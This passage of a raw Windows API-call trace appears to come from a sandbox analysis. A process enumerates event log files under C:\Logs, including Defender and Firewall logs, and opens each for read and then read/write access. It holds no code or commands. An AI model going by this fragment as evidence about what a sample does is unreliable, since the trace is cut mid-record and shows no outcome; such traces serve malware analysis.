lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.846] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.846] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cAlternateFileName="MIDCC7~1.EVT")) returned 1 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0072.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x80a30 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81860 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x814c8 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81918 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x814c8 | out: hHeap=0x20000) returned 1 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x80a30 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81918 | out: hHeap=0x20000) returned 1 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x51398 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0072.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x30fc0 [0072.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0072.848] AreFileApisANSI () returned 1 [0072.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpUsedDefaultChar=0x0) returned 91 [0072.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.848] AreFileApisANSI () returned 1 [0072.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0072.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x51398 [0072.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=91 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 91 [0072.848] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.848] GetFileType (hFile=0x428) returned 0x1 [0072.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.849] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.849] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.849] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.849] CloseHandle (hObject=0x428) returned 1 [0072.849] AreFileApisANSI () returned 1 [0072.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0072.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x51398 [0072.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=91 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 91 [0072.849] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.849] GetFileType (hFile=0x428) returned 0x1 [0072.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.850] CloseHandle (hObject=0x428) returned 1 [0072.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0072.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81860 [0072.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81b40 [0072.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0072.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81ed8 [0072.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0072.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0072.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81ed8 | out: hHeap=0x20000) returned 1 [0072.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81078 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0072.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0072.850] AreFileApisANSI () returned 1 [0072.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0072.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x51398 [0072.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=91 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 91 [0072.850] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.851] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cAlternateFileName="MI7771~1.EVT")) returned 1 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0072.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0072.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0072.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0072.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0072.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0072.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x811e8 [0072.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81410 [0072.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0072.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81410 | out: hHeap=0x20000) returned 1 [0072.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0072.852] AreFileApisANSI () returned 1 [0072.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpUsedDefaultChar=0x0) returned 81 [0072.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.852] AreFileApisANSI () returned 1 [0072.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0072.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5fb08 [0072.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5fb08, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 81 [0072.852] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.853] GetFileType (hFile=0x428) returned 0x1 [0072.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0072.853] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.853] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.854] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.854] CloseHandle (hObject=0x428) returned 1 [0072.854] AreFileApisANSI () returned 1 [0072.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0072.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5fd18 [0072.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5fd18, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 81 [0072.854] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.854] GetFileType (hFile=0x428) returned 0x1 [0072.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0072.854] CloseHandle (hObject=0x428) returned 1 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0072.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.855] AreFileApisANSI () returned 1 [0072.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0072.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5fb08 [0072.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5fb08, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 81 [0072.855] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: 